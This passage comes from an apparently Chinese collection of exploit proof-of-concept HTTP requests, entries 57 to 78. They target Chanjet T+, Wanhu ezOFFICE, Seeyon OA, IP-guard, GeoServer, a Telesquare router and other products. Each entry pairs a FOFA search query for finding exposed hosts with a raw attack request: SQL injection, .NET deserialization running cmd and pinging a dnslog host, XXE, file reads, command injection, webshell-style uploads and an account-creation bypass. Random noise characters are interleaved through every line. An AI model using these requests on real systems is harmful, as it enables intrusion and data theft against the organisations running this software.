, c; O- E. F3 Z4 L$ bHost: x.x.x.x5 |9 Z5 @6 J$ s" d! B2 L2 d& f$ ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36* h! g0 z0 `1 ~# ]; T/ d% a
Content-Type: application/json+ m: d H; Z6 \! X+ B6 v. Y% s
& _, t0 b8 y- ^ t/ h8 e: R{/ W. m) n! H. b5 P9 W+ m6 p
"storeID":{) e* T5 c' A( `) |
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
3 H8 E6 U4 d t! s; y- S( Y2 a "MethodName":"Start",
* d4 u7 b5 w5 n: ]3 C! J! M "ObjectInstance":{
7 I2 V. M5 \/ M9 D' ?- I "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",1 t l& M9 L8 r. K" ]. P" y
"StartInfo": {0 F: m/ T; ~7 u/ i6 n
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 H3 x1 ~ [; W "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"1 d8 C6 }2 T' x" F9 j5 Y
}" e# L, ?8 b8 s2 p" t, ] D- C4 j; h: Q
}
8 z3 h9 X; {( ^! X3 y4 v- W. H. ^ }$ M: E: c- S1 l! v
}& R3 G0 j ~+ z' F* S
. S! W: g1 R& p7 x
2 j* A9 p1 t" D) l
57. 畅捷通T+ keyEdit.aspx SQL注入( c+ ?( m* X0 W; d! x+ r$ N9 Y' t
FOFA:app="畅捷通-TPlus"$ U9 W1 i# p6 k8 ?4 s7 l
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
" y1 T( p! {# i) _( e( u% S; ]1 qHost: host
$ m; }9 P- R2 K5 E$ M$ `User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36( O1 \1 a1 i1 {/ p
Accept-Charset: utf-8$ X+ g6 g2 R8 Z. O
Accept-Encoding: gzip, deflate, w" ^, _+ N c) `$ E4 b
Connection: close# {$ J" M( M$ A" ^- z
' i& k7 J' \2 i' l" V: j! Z; ~" m& h, }' ~! c8 p
58. 畅捷通T+ KeyInfoList.aspx sql注入1 s8 ~# t" O* M Y
FOFA:app="畅捷通-TPlus"% P; R8 m) S" d$ g
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.11 D: W. x- d1 P+ d+ X
Host: your-ip
+ Y* W, I3 g) }+ MUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36) ^1 u% d2 L. j& N! J' I
Accept-Charset: utf-8- M' c, @% P" s1 M$ @+ W
Accept-Encoding: gzip, deflate
7 Z8 A- ]/ J7 ^8 J# i# P5 Q0 QConnection: close
" `2 S/ Q9 \9 O U/ c9 k: h+ h- r- q# |: L8 z) ?2 L I' x
% ^% d% F9 S% B1 V59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行, ]% U! n! ]. R) r8 k
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
- H% `5 w7 l3 M" }. P7 VPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.13 N. a( X4 l- w# {% ?; K& R1 B8 b
Host: 192.168.86.128:9090
& v& Z& C# Q8 WUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.362 P1 X0 S' D8 z$ e$ I
Connection: close+ j: P' ] F0 U( D0 u$ B W: `
Content-Length: 16698 V2 n8 U: Q9 T
Accept: */*
0 V' ~! }4 [5 u* hAccept-Language: en0 U$ g5 \9 }6 E/ m4 k
Content-Type: application/x-www-form-urlencoded
# H* ?; [5 h6 n4 lAccept-Encoding: gzip
& b: h9 W" g- ~) G: h1 k' S7 o# r& K) B: i
PAYLOAD% A3 f- {8 u& j+ X$ l% s8 P; s: G0 j
9 b* ?9 \2 }/ g' t: f) p
5 v* k: B. M3 l! P
60. 百卓Smart管理平台 importexport.php SQL注入+ W8 y1 v' P; B
FOFA:title="Smart管理平台"7 l% |, C# Z4 I$ g* |, W2 K1 q
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1' r1 \4 g4 V# Y r9 D
Host:
4 \: e) r; U1 i: @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
s4 G: } v B8 e K ^1 Q* X3 c3 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ s( G ~3 x9 u# k7 P. P
Accept-Encoding: gzip, deflate! r9 ^: v! j0 H: T. `# u
Accept-Language: zh-CN,zh;q=0.9
; X+ ^) ~1 |3 q9 ?6 s3 o) \Connection: close, P; l- I" B( k$ B+ P
' z- R2 Z. A" j- p4 D) w
' q: f* R, k; k0 \4 }& h61. 浙大恩特客户资源管理系统 fileupload 任意文件上传% I3 D$ c6 ]4 o* p
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
( W# S2 C4 v, ^$ ~! lPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
3 _$ A9 f8 ~; f+ PHost: x.x.x.x+ l8 n9 |2 I) _1 y0 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! o* h/ f9 ?( V9 @
Connection: close
, q/ |: @" w7 zContent-Length: 270 M6 ^$ L% u( _5 n4 U7 i' a
Accept: */*
3 ^. a+ ~$ @5 F: {. g) GAccept-Encoding: gzip, deflate
J, i4 K2 t0 f+ e. ~8 z2 a$ c- Y% UAccept-Language: en
- X) _/ ]2 W! r+ x+ p+ @5 l$ L% KContent-Type: application/x-www-form-urlencoded
' i7 x8 S8 |1 ]- G9 r
2 w0 Y F! T4 T3 r( b: u: y" p/ c* i3 d8uxssX66eqrqtKObcVa0kid98xa
" H7 y- ^* D- n; G3 q( v& m, Y
! n* c% b- ~( j0 t
( C+ R3 q& i; f- C) g' t' q62. IP-guard WebServer 远程命令执行
1 r3 S' L7 j. DFOFA:"IP-guard" && icon_hash="2030860561"# [: f1 p6 f2 @& @! a) P
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
6 {3 y4 q+ w3 v1 V* y$ @6 T- zHost: x.x.x.x
, c H% w" W, D" g- @User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.367 W* [2 h+ ]3 \
Connection: close9 e% s; a! t$ I5 ?/ E# j; ]3 @
Accept: */*3 n' |# n( F6 y
Accept-Language: en8 {6 c# O+ ^* y2 C+ [
Accept-Encoding: gzip/ V3 q {5 i% Z, \
$ a1 B4 x0 _& Z$ c3 i& x
4 K8 ~' c: C! f* z9 T# R访问
, t) g/ x& M2 \( m. x
+ ]7 G7 @$ k0 B' y# W W7 aGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.11 o9 g% W% Y4 h! V P5 K4 M& Y% G
Host: x.x.x.x$ r# U# `* n* Y: Y) X% V0 P/ }. B
& T3 y1 W( m' I+ [) Q3 ~
: Y9 a' p& Q2 g/ |
63. IP-guard WebServer任意文件读取
- C S, C4 h8 V$ o$ a3 HIP-guard < 4.82.0609.00 o/ V4 M: b; o* x
FOFA:icon_hash="2030860561"
( h! d# O9 ~+ S0 N& h$ G1 lPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
1 [0 \! T, _: B! j. IHost: your-ip
; w& u8 y1 Q5 q: S8 r; d5 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.367 w' A: K) ~4 w3 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 m# k; ]( X. U& S
Accept-Encoding: gzip, deflate
% v0 J" c2 K6 h& T# \Accept-Language: zh-CN,zh;q=0.9
! E$ t& I1 w) I& M- z9 LConnection: close4 P/ @) e/ f& j! F. j+ F
Content-Type: application/x-www-form-urlencoded" ~" p9 g! }0 `' o1 y
' \- U8 G; F0 U1 \ m
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
9 [9 ~5 L% @# N+ I1 n3 l7 n$ p2 |% t4 N3 H
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
0 t, s2 y, n! w: G( f1 D1 NFOFA:body="/Scripts/EnjoyMsg.js"% [0 [7 ^2 x+ P9 `- T
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.11 r4 n- [" s" \) G; j0 s& ~
Host: 192.168.86.128:9001' A" l! L" ^; i( N
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' N( A6 W! G$ ^ C+ W' y1 T
Connection: close/ g! \# U- D( ~0 [( p
Content-Length: 369" m) {7 d8 r: G/ N; O
Accept: */*8 m; x8 x7 Q- k0 p" @, E2 I3 @& z
Accept-Language: en
* x2 _' S( f6 v& k% [- NContent-Type: text/xml; charset=utf-8; x+ i5 N- }' L$ Y
Accept-Encoding: gzip
/ h9 Q) c2 W I# ~3 r; q
% B7 |" a1 h* r! g" n<?xml version="1.0" encoding="utf-8"?>
) x; M' Y' H1 _% [* \: M<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">5 _+ k0 r' L! o( ]
<soap:Body>
+ E d6 s3 f* P( ]' ]! }& O. w <GetOSpById xmlns="http://tempuri.org/">0 F, L5 |$ l: |! O
<sId>1';waitfor delay '0:0:5'--+</sId>! e& v% n4 N* T" D: f0 V v
</GetOSpById>
9 g1 i- \2 R# Y. I </soap:Body>& t u) ] @) L; w' x* V
</soap:Envelope>
, J5 O; Z' e' [. P$ Y
4 F- n8 L, z) u' K
5 ^5 A" \) |: K# i1 n65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过. e- j# i; ?" f$ ]& I
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
2 G8 y" q' [& K# [! p响应200即成功创建账号test123456/1234568 C* | Y5 M- {6 ` a
POST /SystemMng.ashx HTTP/1.13 ~+ F! T% S1 {9 J5 F
Host:! T' t8 h8 g) j: g( y
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
2 I6 Q3 I c- GAccept-Encoding: gzip, deflate
/ j0 E9 f. n+ u7 H _2 x0 sAccept: */*
6 ]2 z1 l2 a9 p7 ]Connection: close
% m# V9 n5 w( x# K* PAccept-Language: en8 d+ o) B) Q# n% L% m
Content-Length: 174 ?5 l! H8 r# W6 {
! Y& [& \# {* l: VoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators0 i6 m3 z: B! R- o
, k+ [/ k) Y* A0 w6 a$ X7 Y2 P% h6 X# |$ p& L
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入5 r! R1 h* u5 d# E$ A
FOFA:app="万户ezOFFICE协同管理平台"
/ `7 o0 V% _) y
4 _1 |4 h6 Z5 F# }2 `1 vGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
( ~4 N, d$ N" k/ ZHost: x.x.x.x: p6 a2 W; F; q1 r8 _6 p+ i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) r' g. @# M9 _" F0 _/ h3 `# M( XConnection: close9 F+ l) F$ T/ s' s6 [0 L" C
Accept: */*/ w' {9 C. B2 {! E8 T z( G7 Q- n
Accept-Language: en2 L0 L3 i$ J. }7 ^' m; E6 M9 K
Accept-Encoding: gzip
0 J" e r4 ~' c8 r7 L/ @ }2 |3 ^, k6 M3 v
3 O# R3 [# C" ~, u! b- E4 L
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
4 G, z3 N: ^8 f4 |, T/ x( D, ]9 _ a, R" ~! q2 v2 [9 y7 Q
67. 万户ezOFFICE wpsservlet任意文件上传
' w: M+ M0 x8 [. S4 h( B( iFOFA:app="万户网络-ezOFFICE"
% J* r/ E) }2 b# D2 cnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
. O _9 B7 h3 b7 h7 \POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
% c5 p' j7 ], u* n9 a- wHost: x.x.x.x
5 c! ~! s3 n9 O ~( @4 d3 g$ P" ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
/ W: U# g3 k H0 k4 |, R' dContent-Length: 1734 W: R8 ~7 \, O& v! L" S6 @/ P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8* ]- \+ S) K/ S* [& Q1 U
Accept-Encoding: gzip, deflate
0 w/ u# y5 ~ U; m" PAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
v' H" e% a- `- {' v G* ^Connection: close
5 z2 R; x+ y+ u% X5 F4 MContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp! u$ y6 K9 Y |5 Y
DNT: 1/ a% U- e1 Q* }8 Y6 X% R
Upgrade-Insecure-Requests: 1
8 X# d# O* N4 ~, |8 R) N+ [, v! R( ?
--ufuadpxathqvxfqnuyuqaozvseiueerp
/ g+ I- q4 [% s OContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"8 K8 [3 D5 p% M
/ G# Y, }+ F( U<% out.print("sasdfghjkj");%>* ]) z8 \/ [2 w3 C( d+ q
--ufuadpxathqvxfqnuyuqaozvseiueerp--6 Y2 S! T9 |5 W% D v. `2 P! T
5 e: H$ b) G% q3 f% ?! y7 d% r
+ {( R0 Y5 ~3 ^! b- y3 N文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
! S1 {+ a9 _ p2 X# ~/ m
# V/ ^6 S; l. ^. j5 {3 Y R68. 万户ezOFFICE wf_printnum.jsp SQL注入
3 J! G6 r7 p% ?; V# N" B! uFOFA:app="万户ezOFFICE协同管理平台"
% Z) ?* J1 Q9 _5 j) o/ D/ A' K( y- `$ cGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.16 O5 J; e4 U" Z4 U. ^# k, C6 y
Host: {{host}} m. Y8 b5 T! h, ]6 h) X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
0 i2 \0 P& G. WAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
* `* t% o4 {/ v" r% L! X/ sAccept-Encoding: gzip, deflate q7 U) y* C4 S/ @
Accept-Language: zh-CN,zh;q=0.9* @( A* N+ y' l i4 h, |% h
Connection: close7 R J8 E) X! ~6 v( j+ m- R; [
' G8 c( C# T" j
3 m! B: v/ j$ C/ V# T- m" u69. 万户 ezOFFICE contract_gd.jsp SQL注入" T8 v1 y) K; @
FOFA:app="万户ezOFFICE协同管理平台"& [- t8 p* U y. `
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
' P* g0 q( H0 K i" I6 D1 V9 xHost: your-ip$ ^" O2 v4 `" ]3 |$ Y0 z
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- i- o! h; V9 f
Accept-Encoding: gzip, deflate$ s W( ~% p; {; j/ Q
Accept: */*
- @# V/ J. ^% L/ o) [" }Connection: keep-alive
# G1 j( `% r4 } W P, i$ n( B
# e2 c: D9 b: i6 b! C5 f0 b* t2 J7 I) l
70. 万户ezEIP success 命令执行+ p0 k& f) }, i5 o4 v7 @. }2 C
FOFA:app="万户网络-ezEIP"
5 S/ G0 `9 Z" b# UPOST /member/success.aspx HTTP/1.16 g' w: ?0 w' j O0 p$ f
Host: {{Hostname}}
2 r$ c. L9 o2 u5 H' {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
. |: G$ @. m; w( P7 pSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
( K8 y2 [7 I" K; ~Content-Type: application/x-www-form-urlencoded& u: t ~8 C, d$ P" u1 i, t
TYPE: C, g& P2 v, u! ]: u7 u
Content-Length: 167020 h$ x+ n' X8 M4 l; k
+ Y3 v% g* a' L1 n__VIEWSTATE=PAYLOAD
$ t" q3 m& w4 i% [! f- X1 T$ x: c8 N- p4 i$ [; E
& L5 r% k9 M% L2 t0 a ?& {* c7 m71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入" B# z/ I9 @0 U$ R& j
FOFA:body="PM2项目管理系统BS版增强工具.zip"
4 P. \: F( d) C7 k* p1 HGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
8 I W! j! _- ]. q1 d8 YHost: x.x.x.xx.x.x.x
! `$ X; o6 J; p3 n9 G! lUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36* V. y2 ~9 ~( [ O' `$ I, _
Connection: close7 W9 G" u$ c& q' X, _" G5 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) |+ S: Q) G: j& _1 d$ M. I8 e
Accept-Encoding: gzip, deflate
1 k8 [+ Z* U9 g# W: n9 n7 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 R. M- ^! M# Q
Upgrade-Insecure-Requests: 1; b, p! c+ g- n! S9 L9 y
! b- G1 [2 I$ Q6 {3 k# R
4 v+ M$ [4 t& i5 E5 C( F# ~72. 致远OA getAjaxDataServlet XXE) e3 x# q1 ?! M7 {$ n# m3 G- k
FOFA:app="致远互联-OA"! m3 [( |' I5 A" C& V4 O3 N& f6 ^
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
9 D4 g3 ?6 w$ F: F; e AHost: 192.168.40.131:8099
4 w* Q' R8 F6 c' ^User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
0 F$ f' v: N8 Y2 ]0 oConnection: close# q0 ^4 g Q( O1 } @5 I
Content-Length: 583
) }2 L" c H$ U& y9 ^: e5 JContent-Type: application/x-www-form-urlencoded
: C! X9 n2 s2 VAccept-Encoding: gzip3 b( u9 T$ A& K0 C1 h
* b0 g% o" W6 N+ u/ F; {S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
; F1 Z, |/ @4 T" Y/ w7 _4 U3 X# o/ u+ y; Z
0 I9 z5 b7 o& X73. GeoServer wms远程代码执行
7 F9 ^ ]9 V$ ?) }4 uFOFA:icon_hash=”97540678”' I5 P+ c& B& t; ~4 h& w
POST /geoserver/wms HTTP/1.14 G. z" o o. b K( c
Host:
; Q3 O; V3 ] d1 p* j. h, CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) c( b5 y, L$ a( j) L9 _: U0 FContent-Length: 1981, k" p4 j' _+ C9 e5 o2 e& S
Accept-Encoding: gzip, deflate6 }9 N* Z4 z# S" {3 O0 P
Connection: close
4 @* |* s, D* `( e1 @% v! g* x5 QContent-Type: application/xml
% p$ s8 H+ P3 `4 n2 R7 FSL-CE-SUID: 3
- m% D# ?, d( v+ F6 V* \
! G$ S$ p# H# Q8 N; MPAYLOAD6 ~$ r" c, L# E
4 `! H: j9 C4 v# g1 K5 D' k, g! R1 [; `4 e4 u1 f+ B
74. 致远M3-server 6_1sp1 反序列化RCE- }4 n0 F/ P4 {
FOFA:title="M3-Server"
0 |+ [( ~* f* I$ u( \& nPAYLOAD
( B% J6 | \# z# X3 [
1 t" I- F2 E w75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE& w6 p; s+ @; q0 {
FOFA:app="TELESQUARE-TLR-2005KSH"
+ Q: M6 i [5 X( M& c* pGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.16 ?/ O3 y9 o2 D+ E- B
Host: x.x.x.x+ b1 G0 a* B2 H1 R3 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 _7 J+ F- |2 aConnection: close
+ t4 n2 q. B4 N; f' g+ zAccept: */* @; k+ e* \; J! H) m7 M1 J
Accept-Language: en9 X& a3 \8 |6 y5 g) n! W" v$ l
Accept-Encoding: gzip
* |% i$ c0 F R) ^" i$ F$ G, G% e% w: e. s! H; L! C1 U
: O9 o' A9 K* S; B6 `GET /cgi-bin/test28256.txt HTTP/1.17 x8 [# `; u2 k- T' K0 W
Host: x.x.x.x
) b2 a1 }+ a1 K- j; \7 d* ~) j$ n; Q9 t8 `4 k5 g4 h7 p
7 b# D5 l0 P9 y% }. U3 Y- f
76. 新开普掌上校园服务管理平台service.action远程命令执行
, b# w) `" Q& s; M, \8 R2 xFOFA:title="掌上校园服务管理平台") |3 K$ g" C. v+ B3 ?% C
POST /service_transport/service.action HTTP/1.1
) ?/ ?; I# Y% N+ NHost: x.x.x.x
" t2 d7 Y( `( k$ k4 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 A u! ^( p$ ^" u- f- K
Connection: close5 u; u! E% D1 |: q
Content-Length: 2111 c) D# D& m9 e; h" X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 d. I8 A7 l( K1 s+ dAccept-Encoding: gzip, deflate
* g2 ^% f- W+ D8 c5 ^. }' LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" N" j. z8 S4 a6 V$ ^2 z
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
1 E* `% _. S. l0 P* {3 \Upgrade-Insecure-Requests: 1* L, r, t3 V9 E, b& N* `" Y
" i* v8 r4 e% ~/ n: `
{* p& X; j! B1 _. y' p \
"command": "GetFZinfo",8 z$ u) I8 d8 y2 O8 [# `; s
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
* T U; N5 n. E& o* [ ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
) A) o2 ?2 u6 ~0 I. T5 R1 c} E* E# t6 o+ M2 Y/ K, s( w
6 ?0 {3 J/ a$ S) j- k, @- Y
k1 K: v1 _, C9 x* ~GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1- a' m4 F( W/ P0 U: a% y) h8 a
Host: x.x.x.x0 n5 P: f. d/ A# L
- }+ ?7 k' J- K$ b/ ]4 M, ]# V, p( N
9 w3 T; Z+ W4 }$ t$ w77. F22服装管理软件系统UploadHandler.ashx任意文件上传
+ f! o1 w$ j; X$ V) | M: b+ ?( ]FOFA:body="F22WEB登陆"1 B: ~) V& t7 \, ^& X( s# g& K
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
, T0 C+ G& h; f0 a. L$ ~Host: x.x.x.x
7 c* a3 w0 J6 x! k( z; R% ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
( w& m, m4 A! B9 M% YConnection: close
1 `# U* g7 Y: c1 P0 RContent-Length: 433
1 t8 ?+ L2 o% [' z6 J2 mAccept: */*
* g. @/ T/ D" H" A) RAccept-Encoding: gzip, deflate
; N) |0 F% V$ M' fAccept-Language: zh-CN,zh;q=0.9
8 O; J" C+ H" ?/ l5 S5 F6 LContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
$ ?& g$ d7 H% t3 r8 P
: L8 z7 i8 ^+ b) `& v; E3 E------------398jnjVTTlDVXHlE7yYnfwBoix& m: G4 a+ _' Y0 x4 j3 X
Content-Disposition: form-data; name="folder") h. [5 Q! V# o5 T0 E6 a/ o
( [8 u% S- W2 q6 Y! P
/upload/udplog2 L# O1 y& f) n, [7 | Y7 n; T0 S
------------398jnjVTTlDVXHlE7yYnfwBoix) I2 m' h. b- V3 \. t8 T: ]4 A
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
* b/ y) r2 N2 K" XContent-Type: application/octet-stream: t4 d' r, k8 d; F. D0 C
% V' `4 f3 X0 Fhello1234567
2 L- _* U) c0 F7 q------------398jnjVTTlDVXHlE7yYnfwBoix
+ u7 z+ A1 d) J8 B. g6 FContent-Disposition: form-data; name="Upload"5 A) U, Y" c. T1 T4 z
' C9 w# l1 N% O# I1 \Submit Query. T* s6 N, `1 @4 T
------------398jnjVTTlDVXHlE7yYnfwBoix--
, k0 ~+ g3 c9 j2 X8 Y |. p* w
, N& _0 S0 _, s6 K& j$ \7 n( U, Q3 c9 l6 Y
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传' |, `" p* `, [
FOFA:icon_hash="2001627082"
8 _0 j: g v) y! \4 U$ r% dPOST /Platform/System/FileUpload.ashx HTTP/1.1
# v& t" Z# G9 y- o0 \" s5 mHost: x.x.x.x
- }& F% ^9 k8 O8 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" \7 m' n5 f# t- N M% UConnection: close: v/ n- t5 g& t5 X! X. l; r
Content-Length: 336
+ J4 I, L E+ m* X8 z3 M. RAccept-Encoding: gzip& e" ~. n) Q* e: w L
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l3 r. K* p/ `8 y- r. i }
X! b! l$ K n- G! L- H! n C
------YsOxWxSvj1KyZow1PTsh98fdu6l
% }9 Q- U/ _" _4 c o, `4 ^4 XContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"1 a; g- x+ F8 l4 D _ j
Content-Type: image/png- T1 M. P" w! _6 Q) Y: G) K
' E0 m/ ~. z% e1 d: N- w* h
YsOxWxSvj1KyZow1PTsh98fdu6l
' }8 A8 ^/ H! O2 h------YsOxWxSvj1KyZow1PTsh98fdu6l
& t8 C$ t. V0 s: D8 `. l* MContent-Disposition: form-data; name="target"
' N) W2 Y0 f$ E+ h, N2 B5 L4 o: ^* }$ P6 l5 y; l' r
